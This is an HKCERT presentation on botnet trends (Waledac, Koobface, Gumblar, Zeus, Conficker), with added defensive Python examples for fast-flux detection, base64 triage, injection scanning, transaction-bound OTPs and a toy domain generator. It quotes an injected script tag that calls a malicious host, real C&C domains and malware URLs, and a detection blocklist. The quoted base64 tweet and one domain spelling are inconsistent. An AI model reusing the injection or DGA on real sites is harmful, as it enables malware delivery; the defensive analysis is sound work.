Cyber Attack Trend and Botnet




Cyber Attack Trend and Botnet
S.C. Leung, CISSP CISA CBCP

Agenda
- Botnet and Cyber Attack Trends
- Botnet Attack Trends
  1. Commercialization of Cyber Crime
  2. Professionalization of Cyber Crimeware
  3. Social Engineering always cool: Waledac botnet
  4. Following the Social Network Services: Koobface botnet
  5. Delivering via Web attack & Search Engine: Gumblar botnet
  6. Following the Money: Banking Trojans like Zeus botnet
  7. Building the Survival Kit: Conficker botnet
- Defending against Botnet
(Page 2)

Botnet (robot Network) = infrastructure of controlled victim computers (bots)

Diagram (reconstructed from the slide):
  Bot Herder
    | Down: Command/Update        ^ Up: Data
  C&C      C&C      C&C
    | Down: Command/Update        ^ Up: Data
  bot  bot  bot  bot  bot  bot  bot
    -> Spam, Malware, Phishing -> victim
    -> DDoS attack             -> victim
(Page 3)

1. Commercialization of Cyber Crime

Product and Service Delivery for Profit
What do attackers want now? What are their products and services?
- Products: personal credentials, CCN, SSN, software CD keys
- Tools to exploit, tools to hide malware
- Service subscription: spam, phishing, DDoS botnet (76services.com, now closed)
(Page 5)

2. Professionalization of Cyber Crimeware

Professionalization of Cyber Crimeware
Division of Labour, R&D and Outsourcing
- Malware development, Botnet optimization
  - Malware good at detection evasion
  - Malware targeting, identifying and terminating security software
  - Multi-language support
  - Remote administration support
  - Signing and encryption
- Botnet is a sign of maturity of the infrastructure for the underground economy
  - Service delivery
  - Maintenance
  - Long term control
- IT Infrastructure
  - Hosting: network and web hosting in a hacker-friendly environment
    - where there is great bandwidth
    - where legislation is lax
    - where user awareness is low
  - Domain: registration and domain hosting where the take-down procedure is lengthy
(Page 7)

3. Social Engineering always cool: Waledac Botnet

Waledac Botnet
- Spreading by spam emails
  - employ social engineering extensively
  - contain a link to an iframe-embedded malicious website, tricking the user to install the malware
- Author = creator of the Storm botnet (which overwhelmed the Internet back in 2007)
- Has sound infrastructure
  - uses Nginx web server
  - uses Double Fast Flux DNS
    - The DNS records are changing all the time
    - The DNS servers are changing all the time
(Page 9)

Waledac Fast-flux
Bot hosts can be dynamically assigned in real time
(Page 10)
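The double fast flux described above leaves a measurable trace in DNS: repeated lookups of the same name return ever-changing A records, and the name servers answering for the zone change too, all with short TTLs. The following is an added example, not code from the presentation, of how a responder could score that behaviour over a resolver log. The observations, thresholds and host names are constructed for the example.

```python
# Added example (not from the slides): a simple fast-flux detector over a
# constructed log of repeated DNS lookups. Double fast flux shows up as two
# signals: the A records answered for the host keep changing, and the NS
# records (the servers that answer) keep changing too, with short TTLs.
# A real deployment would read a resolver log or passive DNS; these rows are made up.
from collections import defaultdict

# Constructed sample: (hostname, record_type, value, ttl) observed over time.
OBSERVATIONS = [
    # a legitimate site: stable answers, normal TTL
    ("www.example-bank.test", "A", "198.51.100.10", 3600),
    ("www.example-bank.test", "A", "198.51.100.10", 3600),
    ("www.example-bank.test", "NS", "ns1.example-bank.test", 86400),
    ("www.example-bank.test", "NS", "ns1.example-bank.test", 86400),
    # a flux host: new address and new name server almost every lookup, tiny TTL
    ("cards.flux-spam.test", "A", "203.0.113.5", 300),
    ("cards.flux-spam.test", "A", "203.0.113.77", 300),
    ("cards.flux-spam.test", "A", "192.0.2.9", 180),
    ("cards.flux-spam.test", "A", "192.0.2.200", 120),
    ("cards.flux-spam.test", "NS", "ns-a.flux-spam.test", 600),
    ("cards.flux-spam.test", "NS", "ns-b.flux-spam.test", 600),
    ("cards.flux-spam.test", "NS", "ns-c.flux-spam.test", 300),
]

def summarize(observations):
    """Group observations per host: distinct A values, distinct NS values, minimum TTL seen."""
    per_host = defaultdict(lambda: {"A": set(), "NS": set(), "min_ttl": None})
    for host, rtype, value, ttl in observations:
        entry = per_host[host]
        entry[rtype].add(value)
        entry["min_ttl"] = ttl if entry["min_ttl"] is None else min(entry["min_ttl"], ttl)
    return per_host

def flux_score(entry):
    """Heuristic score: distinct A records + distinct NS records, plus a bonus for short TTLs.
    The weights are constructed for this example, not taken from the slides."""
    distinct = len(entry["A"]) + len(entry["NS"])
    short_ttl_bonus = 2 if entry["min_ttl"] is not None and entry["min_ttl"] <= 300 else 0
    return distinct + short_ttl_bonus

def classify(observations, threshold=6):
    """Return {host: 'double-flux' | 'single-flux' | 'stable'}."""
    result = {}
    for host, entry in summarize(observations).items():
        score = flux_score(entry)
        if score >= threshold and len(entry["NS"]) > 1:
            result[host] = "double-flux"      # both A and NS records rotate
        elif len(entry["A"]) > 2 and entry["min_ttl"] <= 300:
            result[host] = "single-flux"      # only the A records rotate
        else:
            result[host] = "stable"
    return result

if __name__ == "__main__":
    for host, verdict in classify(OBSERVATIONS).items():
        print(f"{host}: {verdict}")
```

The score deliberately needs several lookups over time: a single answer with a short TTL is normal for a CDN, so the detector only fires once the set of answers (and, for double flux, the set of name servers) has actually churned.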

Waledac theme: ecard
Social engineering follows the talk of the town (lure file: postcard.exe)
(Page 11)

Waledac Themes
Social engineering follows the talk of the town. Theme examples shown on the slide: Terrorist Attack; SMS Spy on your Partner; Independence Day; Play
(Page 12)

Waledac Service and Feature Impact
- open a back door on the compromised computer
- steal personal information
- spam contacts in the address book
- turn the zombie into a web server, web proxy, DNS and spam template relay
- Major web server service: Pharmacy, serving malware
(Page 13)

4. Following the Social Network Services

Koobface (koob-face)
A worm spreading in Facebook, MySpace, Twitter, Friendster, hi5 & Bebo
- Spreading
  - Spoof a friend and send a message "Hello; You must see it!!! LOL" with a URL
  - The URL brings the user to a fake YouTube site, luring them to install a file Flash_update.exe
  - Upon execution, the victim is infected.
- Impact
  - Poison all user searches (Google, Ask, Yahoo and Bing) to a malicious site
(Page 15)
http://www.f-secure.com/weblog/archives/00001517.html

Koobface: Twitter campaign
PCs infected with Koobface sent out Tweets with a malicious URL
(Page 16)

A Botnet uses Twitter as Command Channel
- Bots subscribe to an RSS feed to get commands
- A Tweet like this:
  ahr0cdovl2jpdc5ses9snlnuviagahr0cdovl2jpdc5ses8ys29Ibw==
- Base64 decode the tweet, we got 2 tiny URLs:
  http://bit.ly/r6stv
  http://bit.ly/2koho
- The bit.ly tiny URLs translated to:
  http://pastebin.com/pastebin.php?dl=m5222dc70
  http://paste.debian.net/43529/download/43529
- The URLs are encoded files. When decoded and unzipped, they give malware files which were found to be poorly detected by VirusTotal as malware
(Page 17)

5. Delivering via Web attack & Search Engine: Gumblar Botnet
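The triage step on this slide (spot a tweet that is really base64, decode it, pull out the URLs) is easy to automate when monitoring a feed for abuse. The block below is an added example written for this page, not the presenter's code: it scans constructed tweets, decodes any token that is valid base64 and yields printable text, and collects the URLs found inside. The feed and the example.test URLs are made up.

```python
# Added example (not the slides' code): scan a feed of tweets for base64-encoded
# payloads and pull out any URLs hidden inside, the way an analyst would triage
# a suspected Twitter command channel. The tweets below are constructed; the
# URLs in them point at example.test, not at real shorteners.
import base64
import binascii
import re

URL_RE = re.compile(r"https?://[^\s\"'<>]+")
# Base64 alphabet, optional padding, no whitespace; require a sensible minimum length
# so ordinary words are not treated as candidates.
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")

def try_base64(text):
    """Return decoded text if `text` is valid base64 that decodes to printable ASCII, else None."""
    if not B64_RE.match(text):
        return None
    try:
        raw = base64.b64decode(text, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        decoded = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return decoded if decoded.isprintable() else None

def extract_hidden_urls(tweet):
    """Decode each whitespace-separated token that looks like base64; collect URLs found inside."""
    urls = []
    for token in tweet.split():
        decoded = try_base64(token)
        if decoded:
            urls.extend(URL_RE.findall(decoded))
    return urls

def triage_feed(tweets):
    """Map tweet text -> list of hidden URLs, only for tweets that carry any."""
    found = {}
    for tweet in tweets:
        urls = extract_hidden_urls(tweet)
        if urls:
            found[tweet] = urls
    return found

# Constructed feed: two ordinary tweets and one carrying a base64-encoded pair of URLs.
COMMAND = base64.b64encode(b"http://example.test/a1  http://example.test/b2").decode()
SAMPLE_FEED = [
    "lunch was great, back to work",
    COMMAND,
    "good morning everyone",
]

if __name__ == "__main__":
    for tweet, urls in triage_feed(SAMPLE_FEED).items():
        print(tweet[:30] + "...", "->", urls)
```

The extracted URLs would then go to the usual enrichment (shortener expansion, hosting lookup, blocklist check) rather than being fetched blindly; the slide's point is that the content behind them was malware that scanners barely detected.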

Gumblar Botnet: Impact
- The web site is a delivery channel of malware
- Gumblar steals FTP credentials and uploads malware to 3000 legitimate web sites
- The botnet connects to two domains for download: gumblar.cn / martuz.cn
- Two botnets formed: one for web sites and one for infected client PCs
Impacts
- Client PCs:
  - install a backdoor in victims' computers that connects to the C&C
  - steal FTP credentials from the victims' computers
  - Man in the browser attack: monitor traffic to and from the browser:
    - Replace Google search results with links pointing to malicious websites
    - Redirect from e-commerce or banking sites to phishing web sites
- Web sites:
  - compromise any websites owned or operated by the victims
  - distribute malware which exploits Acrobat Reader & Flash Player vulnerabilities
(Page 19)

Gumblar Botnet: Obfuscation
Web pages are injected with obfuscated scripts, which vary from site to site, or page to page (analysed with Malzilla)
Injected tag shown on the slide: <script src=//martus.cn/vid/?id=j></script>
(Page 20)

Gumblar Botnet: Detection and Take down
- Blocking: block the two C&C sites: gumblar.cn and martuz.cn
- Checking (not 100% accurate): http://www.unmaskparasites.com/security-report/
(Page 21)

6. Following the Money
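The two Gumblar slides above (injected obfuscated scripts, and blocking the two C&C domains) lend themselves to a check a site owner can run over their own pages. This added example, not from the presentation or from any Gumblar tooling, parses HTML, flags external script tags whose host is on a blocklist built from the two domains the slides name, and flags inline scripts that show common obfuscation markers. The two HTML pages are constructed; the first imitates the injected tag shown on the slide.

```python
# Added example (not from the slides): a small scanner a webmaster could run over
# their own pages to spot the kind of injection Gumblar used. The blocklist holds
# the two C&C domains the slides name; the HTML samples are constructed.
from html.parser import HTMLParser
import re
from urllib.parse import urlsplit

BLOCKLIST = {"gumblar.cn", "martuz.cn"}
# Tokens that frequently appear in obfuscated injected scripts (heuristic, constructed here).
OBFUSCATION_RE = re.compile(r"\b(eval|unescape|fromCharCode)\b|%[0-9a-fA-F]{2}%[0-9a-fA-F]{2}")

def host_of(src):
    """Extract the host from a script src, handling protocol-relative '//host/...' forms."""
    if src.startswith("//"):
        src = "http:" + src
    return (urlsplit(src).hostname or "").lower()

class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies from a page."""
    def __init__(self):
        super().__init__()
        self.external = []   # src values of <script src=...>
        self.inline = []     # bodies of inline <script> blocks
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False

def scan_page(html):
    """Return findings as ('blocklisted-src', src) or ('obfuscated-inline', snippet) tuples."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        if host_of(src) in BLOCKLIST:
            findings.append(("blocklisted-src", src))
    for body in parser.inline:
        if OBFUSCATION_RE.search(body):
            findings.append(("obfuscated-inline", body.strip()[:40]))
    return findings

# Constructed samples. The first mimics the injected tag shown on the slide
# (a protocol-relative src pointing at the C&C domain) plus an obfuscated inline
# script; the second is a clean page with a normal CDN script.
INJECTED_PAGE = """<html><body><p>Welcome</p>
<script src=//martuz.cn/vid/?id=j></script>
<script>eval(unescape('%61%6c%65%72%74'))</script>
</body></html>"""
CLEAN_PAGE = """<html><body><script src="https://cdn.example.test/app.js"></script>
<script>document.title = 'hello';</script></body></html>"""

if __name__ == "__main__":
    print("injected:", scan_page(INJECTED_PAGE))
    print("clean:", scan_page(CLEAN_PAGE))
```

Because the injected scripts varied from page to page, the domain blocklist is the reliable signal and the obfuscation heuristic is a prompt for manual review; a clean result from either check is no proof the site is clean, which matches the slide's own caveat that the checking service was not 100% accurate.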

Botnet targeting Banks
What I have seen on a Zeus Botnet C&C Management interface
Bot administration features:
- Screenshot (save to html without image)
- Fake redirect (redirect to a prepared fake bank webpage)
- Html inject (hijack the login session and inject new field)
- Log the visiting information of each banking site, record the input string (text or post URL)
- An unknown field (table: yes/no) found with syntax nn:nnnnnnnn; if the value is yes, mostly with comment, the comment logged the a/c information, e.g. transfer limit.
(Page 23)

Fake Redirect login page
(Page 24) Source: Computer Associates

Man-in-the-Browser: Hacker's ideal operation
- Intercept the transaction
- Change the amount and change the destination to the attacker's account, and send to the bank
- Change the display to the user as if his transaction was executed
- Calculate the "should be" amount and rewrite the remaining total to the screen
Source: www.cronto.com
(Page 25)

Man in the Browser (MITB)
- Install software/plugin inside the browser
- Hook key OS and web browser APIs and proxy data
Advantage
- No encryption barrier as in a proxy
  - SSL padlock is unaffected for modified content
- Direct access to data
  - Freely alter the web page displayed to the customer
  - Freely modify the requests sent back to the bank
- Direct interface to web browser & application
  - Can create additional commands (GET/POST/PUT)
- Extremely stealthy
  - Hard to detect on the client, since the network is not interfered with; web address and digital certificates are all correct
  - Bank sees the customer's real IP address
- Faster real-time response, so it can break 2FA
(Diagram: Web App <-> MITB <-> Winsock)
(Page 26)

Limbo 2 - HTML Injection
- Limbo 2 Trojan kit
- Some variants inject fake fields into the online banking forms that the browser displays to the user. The additional fields are designed to collect details to help an attacker to impersonate the victim and/or compromise the victim's account.
- What is the use of getting the additional info?
Source: ThreatExpert
(Page 27)

Inserting a transaction (at login)
Sequence reconstructed from the slide diagram:
- Login: the user submits PIN + OTP
- The Trojan kicks up a shadow login at the back (Shadow Login: PIN + OTP submitted)
- The Trojan inserts a new window: "Not successful. Please retry"; the user submits PIN + OTP2
- The hacker uses OTP2 to authenticate a transaction
(Page 28)

HKMA Circular 2009-07-13
"The HKMA noticed that the recent fraudulent technique adopted by fraudsters is believed to involve infecting the customer's personal computer (PC) with Trojan horse programs to hijack the Internet banking login credentials of customers (including one-time passwords for two-factor authentication) during the Internet banking login process. The hijacked login credentials were used by the fraudsters to conduct high-risk Internet banking transactions such as making fund transfer to an unregistered third-party account."
(Page 29)

7. Building the Survival Kit: Conficker Botnet
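The MITB, Limbo 2 and HKMA slides above all describe the same weakness: a login OTP proves the customer is present, but says nothing about which transaction is being approved, so a trojan that captures a second OTP (or rewrites the amount and destination behind the SSL padlock) can spend it on a transfer of its own choosing. The standard bank-side mitigation is to bind the code to the transaction details. The block below is an added example, not from the slides or the circular, of that idea: the code is an HMAC over destination account, amount and a per-transaction nonce, and the bank recomputes it from the details it actually received. The secret, account numbers, amounts and nonce are constructed; a real deployment would compute the same value on a hardware token or app from details the customer reads off that device, not off the browser.

```python
# Added example, not from the slides or the HKMA circular: a transaction-bound
# one-time code as one server-side mitigation for the man-in-the-browser flow.
# A code generated for the genuine transfer fails verification when the trojan
# rewrites the amount or the destination account. All values are constructed.
import hmac
import hashlib

def transaction_code(secret, dest_account, amount_cents, nonce, digits=6):
    """HMAC-SHA256 over the transaction details, truncated to `digits` decimal digits."""
    msg = f"{dest_account}|{amount_cents}|{nonce}".encode()
    mac = hmac.new(secret, msg, hashlib.sha256).digest()
    # Dynamic truncation in the style of HOTP: take 4 bytes at an offset given by the last nibble.
    offset = mac[-1] & 0x0F
    value = int.from_bytes(mac[offset:offset + 4], "big") & 0x7FFFFFFF
    return f"{value % (10 ** digits):0{digits}d}"

def verify_transfer(secret, dest_account, amount_cents, nonce, submitted_code):
    """Bank-side check: recompute the code from the details the bank actually received."""
    expected = transaction_code(secret, dest_account, amount_cents, nonce)
    return hmac.compare_digest(expected, submitted_code)

# Constructed scenario: the customer approves 100.00 to account A. The trojan rewrites
# the request to 5,000.00 to account B, but can only replay the code the customer produced.
SECRET = b"constructed-per-customer-token-secret"   # hypothetical per-customer token secret
NONCE = 4711                                         # hypothetical per-transaction counter issued by the bank
GENUINE = ("HK-ACCT-000123", 10000)
TAMPERED = ("HK-ACCT-999888", 500000)

def demo():
    """Return (genuine_verifies, tampered_verifies) for the scenario above."""
    code = transaction_code(SECRET, GENUINE[0], GENUINE[1], NONCE)
    genuine_ok = verify_transfer(SECRET, GENUINE[0], GENUINE[1], NONCE, code)
    tampered_ok = verify_transfer(SECRET, TAMPERED[0], TAMPERED[1], NONCE, code)
    return genuine_ok, tampered_ok

if __name__ == "__main__":
    print(demo())
```

The nonce also defeats the "shadow login" replay on the Limbo 2 slide: a code the customer produced for one login or transaction is not valid for any other, whatever the trojan shows on screen. This only helps if the customer enters the destination and amount into the token themselves, since a value typed into the browser is exactly what the MITB controls.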

Conficker - Propagation Mechanism
(Page 31) Source: Cisco 2009 MidYear Report

Conficker: a model for a sustainable botnet
- Designed to survive in disaster: what if the C&C are taken down?
- Conficker.B: domain generation for malware update
  - Active since Nov 2008, generating 250 domains/day in 5 TLDs for update
- Conficker's natural predator: the Conficker Working Group
  - Alliance of ICANN, domain registries and the IT industry worked together to pre-empt Conficker
  - Pre-register domains
  - Redirect traffic to sinkholes to study the behaviour
- Conficker.C improved
  - Starting Apr 1, 2009, generating 50,000 domains/day in 116 TLDs; uses 500 at random (some are existing domains), making it harder to pre-empt the domains
  - Improved authentication and encryption, so you cannot infiltrate the Conficker.C botnet easily
  - Uses P2P for update as well: peers can update each other with the right authentication
  - Blocks more security vendors' web sites
(Page 32)

Collaborative Effort Works!
- The Conficker Working Group led a concerted effort (www.confickerworkinggroup.org)
  - ICANN organized all registries to pre-empt the registration and handle affected domains
  - Researchers generated the list of generated domains and affected domains to provide transparency
  - Some worked out an EyeChart for easy detection
  - Security vendors developed detection and removal tools
- HKIRC, HKCERT, Police and OGCIO
  - Check affected domains in the April list for suspicious content
  - Put idle domains under close observation
  - Exchange intelligence on the progress
  - Coordinate with CNCERT/CC on an HK IP address owned by a mainland web hosting provider
(Chart legend: No infection / Conficker.C / Conficker.A/B)
(Page 33)

Conficker: a model for a sustainable Botnet
- Everyone is watching the domain generation, but nothing happened there
- Since Conficker has dual update mechanisms, domain generation and P2P, it takes the liberty to use either one at any time.
- Conficker succeeded in evolving via the P2P channel.
- We still have a long way to go to close it down.
(Page 34)
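The two Conficker slides give the numbers behind the working group's problem: 250 fixed domains a day can be pre-registered in full, but 50,000 candidates of which the bot tries 500 at random cannot. The block below is an added example, not the slides' material and not Conficker's real algorithm, that makes the arithmetic concrete. It uses a constructed date-seeded generator as a stand-in for a DGA (so a defender who knows the algorithm can produce tomorrow's list for registries), and computes the probability that a bot still reaches an unregistered domain given how many of the day's candidates the defenders managed to take.

```python
# Added example (not from the slides, and not Conficker's real algorithm): a
# toy date-seeded domain generator standing in for a DGA, plus the arithmetic
# behind the slide's point that 50,000 candidates with 500 random picks is far
# harder to pre-empt than 250 fixed domains. Defenders who know the generator
# can compute tomorrow's list and register or sinkhole it in advance; what they
# cannot easily do is register every candidate when the list is huge.
import hashlib
from datetime import date, timedelta
from math import comb

TLDS = ["com", "net", "org", "info", "biz"]  # five TLDs, matching the Conficker.B count on the slide

def toy_dga(day, count, tlds=TLDS):
    """Constructed, deterministic generator: SHA-256 of (date, index) -> 8 letters + TLD.
    Anyone who knows the algorithm can reproduce the list for any date, which is
    exactly what let the working group pre-register domains."""
    domains = []
    for i in range(count):
        h = hashlib.sha256(f"{day.isoformat()}:{i}".encode()).digest()
        label = "".join(chr(ord("a") + b % 26) for b in h[:8])
        domains.append(f"{label}.{tlds[h[8] % len(tlds)]}")
    return domains

def preregistration_list(today, days_ahead, count):
    """What a working group would hand to registries: the next `days_ahead` days of domains."""
    return {d for k in range(1, days_ahead + 1) for d in toy_dga(today + timedelta(days=k), count)}

def p_bot_reaches_unblocked(total, registered, picks):
    """Probability that at least one of `picks` domains drawn without replacement from
    `total` candidates falls outside the `registered` set (hypergeometric tail)."""
    if picks > registered:
        return 1.0   # the bot tries more domains than the defenders hold; it always finds one
    p_all_blocked = comb(registered, picks) / comb(total, picks)
    return 1.0 - p_all_blocked

if __name__ == "__main__":
    sample_day = date(2009, 4, 1)   # constructed date, chosen to match the slide's Conficker.C start
    print("first candidates:", toy_dga(sample_day, 3))
    print("to pre-register for the next 2 days:", len(preregistration_list(sample_day, 2, 250)))
    # Conficker.B-style: 250 candidates, all tried, all registered -> bot reaches nothing.
    print("250 of 250 registered:", p_bot_reaches_unblocked(250, 250, 250))
    # Conficker.C-style: even 99% coverage of 50,000 leaves 500 random picks almost certain to escape.
    print("49,500 of 50,000 registered, 500 picks:", round(p_bot_reaches_unblocked(50000, 49500, 500), 4))
```

With 250 fixed domains, registering all of them gives a probability of 0 that a bot finds an update server. Holding 99% of 50,000 candidates still leaves a bot that tries 500 of them a roughly 99% chance of hitting an unregistered one, which is why the slide says pre-emption got harder and why the P2P channel, which needs no domains at all, mattered even more.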

Defending against Botnets: Enhance Response
- The Conficker Working Group approach works! ICANN and others are collaborating more to speed up take-down.
  - Sharing of intelligence
  - Speed up takedown
  - Pre-empt future attacks
- HKCERT
  - Proactive discovery of malicious sites in Hong Kong (with limited resources)
  - Awareness education for service providers: HKCERT organized with OGCIO and HKPF an ISP Symposium in May 2009
  - Cyber Drill: HKCERT organized with OGCIO and HKPF a cyber drill with the theme "Combating Cyber Crime" in July 2009
- HKMA & Banks
  - HKMA circular
  - Banks tighten their procedures for high-risk transactions and fraud detection
(Page 36)

Defense against Botnet
- Botnet is malware
- 3 baseline defenses are necessary, though insufficient
  - Protection from malware (note: browser plugins can be malicious or a weak point)
  - Personal firewall
  - Update patches
- Server defense
  - Install minimum modules on the server. Do not use it to browse the Internet
  - Keep patching up to date
  - Protect from web attacks: application firewall; see the SQL Injection Defence Guideline published by HKCERT
(Page 37)

Monitor software patch level and take prompt action
- Secunia Personal Software Inspector
  - Scans installed Windows software and their patch level, with threat level
  - Provides a link to download the available patch or workaround
  - http://secunia.com/vulnerability_scanning/personal/
(Page 38)

Monitor software update
- CleanSofts.com Update Notifier
  - scans installed Windows software and displays a list of updates
  - verifies the software against malware (best effort with current AV software only, so it is no better than VirusTotal)
  - http://cleansofts.org/view/update-notifier.html
(Page 39)

Safe Browsers
- Browsers add anti-malware and anti-phishing features: IE, Mozilla, Opera; add the Netcraft toolbar if you want
- Minimize your browser and plug-ins
- Firefox and Flock browsers now incorporate Google safety alerts
- New browsers use a sandbox approach: Chrome
(Page 40)

Detecting Botnet: next presentation

Q & A
S.C. Leung (梁兆昌) scleung@hkcert.org

Building up a Botnet
- Having the malware to infect user machines
  - Detection evasion advancement
  - Control and update
- Getting a channel to deliver the malware
  - Spam: social engineering (Waledac)
  - Legitimate web server redirecting users to exploit servers (Gumblar)
  - Social network redirecting users to exploit servers (Koobface)
  - Exploit servers hosting the malware: exploiting vulnerabilities (Windows, browser, Office, Acrobat Reader, Adobe Flash, etc.) of the victim machine
- Controlling the victim PCs
  - Botnet Command and Control Centre
  - Providing resilience in case of take down by law enforcement
    - Fast Flux DNS: to make the structure more dynamic
    - Disaster Recovery: find a way to recover (Conficker)
(Page 43)